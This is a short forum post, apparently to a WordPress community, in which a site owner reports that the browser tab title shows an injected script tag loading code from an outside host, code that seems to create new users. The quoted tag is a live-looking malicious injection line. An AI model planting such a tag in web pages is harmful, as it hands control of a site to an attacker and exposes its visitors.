What does this mean in my websites Chrome tab?

Dear WordPress Reddit,

I'm really worried here. Since today I noticed that in Chrome my websites tab is not showing its title instead it's showing a text <script src=https://xmlrpc.online/x/h.js?zz></script>

What is going on? When I go to that link it shows multiple lines of code that has something to do with console and creating new users or something… For what it's worth no new users are visible in the user accounts page in WordPress and as far as I can tell the website is still working perfectly fine?
